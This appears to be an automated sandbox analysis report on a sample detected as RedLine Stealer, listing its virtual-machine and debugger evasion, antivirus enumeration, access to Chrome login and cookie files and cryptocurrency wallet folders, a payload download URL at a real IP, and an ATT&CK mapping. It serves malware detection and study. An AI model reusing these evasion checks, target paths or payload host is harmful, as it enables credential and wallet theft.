                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816191456.0000000002AA0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe TID: 7060Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe TID: 6104Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A95BB rdtsc
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWindow / User API: threadDelayed 472
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWindow / User API: threadDelayed 762
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWindow / User API: threadDelayed 2737
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_0040290B FindFirstFileW,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeSystem information queried: ModuleInformation
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816191456.0000000002AA0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: vmicvss
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001607711.0000000000A04000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816191456.0000000002AA0000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=http://185.112.83.8/Allocation.bin
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001581740.00000000009D8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW`
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816256236.000000000433A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001996550.000000000252A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

                        Anti Debugging:

                        barindex
                        Hides threads from debuggersShow sources
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_729B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A95BB rdtsc
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A9CFA mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A7471 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A8C74 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A510D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A912F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A8362 LdrInitializeThunk,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeMemory allocated: page read and write | page guard
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess created: C:\Users\user\Desktop\mixfive_20211216-221155.exe "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1007540996.00000000218F8000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1007512982.00000000218BF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1007474717.0000000021860000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001558662.00000000009B8000.00000004.00000020.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001642120.0000000000A28000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1007540996.00000000218F8000.00000004.00000001.sdmpBinary or memory string: Defender\MsMpeng.exe

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20590000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20b60000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.mixfive_20211216-221155.exe.a3fcd8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20590000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20b60000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.1e140086.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20590ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.mixfive_20211216-221155.exe.a3fcd8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.1e140f6e.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.1e140f6e.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20590ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.1e140086.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1006896564.0000000020B60000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: mixfive_20211216-221155.exe PID: 4240, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Tries to steal Crypto Currency WalletsShow sources
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmpString found in binary or memory: l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmpString found in binary or memory: l-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1007540996.00000000218F8000.00000004.00000001.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\*.json\*:h
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1007540996.00000000218F8000.00000004.00000001.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\*.json\*:h
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmpString found in binary or memory: l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: Yara matchFile source: 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: mixfive_20211216-221155.exe PID: 4240, type: MEMORYSTR

                        Remote Access Functionality:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20590000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20b60000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.mixfive_20211216-221155.exe.a3fcd8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20590000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20b60000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.1e140086.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20590ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.mixfive_20211216-221155.exe.a3fcd8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.1e140f6e.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.1e140f6e.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.20590ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.mixfive_20211216-221155.exe.1e140086.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1006896564.0000000020B60000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: mixfive_20211216-221155.exe PID: 4240, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation221Path InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping1Security Software Discovery541Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                        Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection11Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion431Security Account ManagerVirtualization/Sandbox Evasion431SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol111Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery126VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        mixfive_20211216-221155.exe4%VirustotalBrowse

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\nsiE423.tmp\System.dll3%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\nsiE423.tmp\System.dll0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://service.r0%URL Reputationsafe
                        http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id90%URL Reputationsafe
                        http://tempuri.org/Entity/Id80%URL Reputationsafe
                        http://tempuri.org/Entity/Id50%URL Reputationsafe
                        http://tempuri.org/Entity/Id40%URL Reputationsafe
                        http://tempuri.org/Entity/Id70%URL Reputationsafe
                        http://tempuri.org/Entity/Id60%URL Reputationsafe
                        http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                        http://185.112.83.8/Allocation.binwq0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                        http://185.112.83.8/Allocation.bin0%Avira URL Cloudsafe
                        http://support.a0%URL Reputationsafe
                        http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                        https://api.ip.sb/ip0%URL Reputationsafe
                        http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id200%URL Reputationsafe
                        http://tempuri.org/Entity/Id210%URL Reputationsafe
                        http://tempuri.org/Entity/Id220%URL Reputationsafe
                        http://tempuri.org/Entity/Id230%URL Reputationsafe
                        http://tempuri.org/Entity/Id240%URL Reputationsafe
                        http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                        http://forms.rea0%URL Reputationsafe
                        http://tempuri.org/Entity/Id100%URL Reputationsafe
                        http://tempuri.org/Entity/Id110%URL Reputationsafe
                        http://tempuri.org/Entity/Id120%URL Reputationsafe
                        http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id130%URL Reputationsafe
                        http://tempuri.org/Entity/Id140%URL Reputationsafe
                        http://tempuri.org/Entity/Id150%URL Reputationsafe
                        http://tempuri.org/Entity/Id160%URL Reputationsafe
                        http://tempuri.org/Entity/Id170%URL Reputationsafe
                        http://tempuri.org/Entity/Id180%URL Reputationsafe
                        http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id190%URL Reputationsafe
                        http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id8Response0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://185.112.83.8/Allocation.bintrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                            high
                            https://duckduckgo.com/chrome_newtabmixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmpfalse
                              high
                              http://service.rmixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkmixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpfalse
                                high
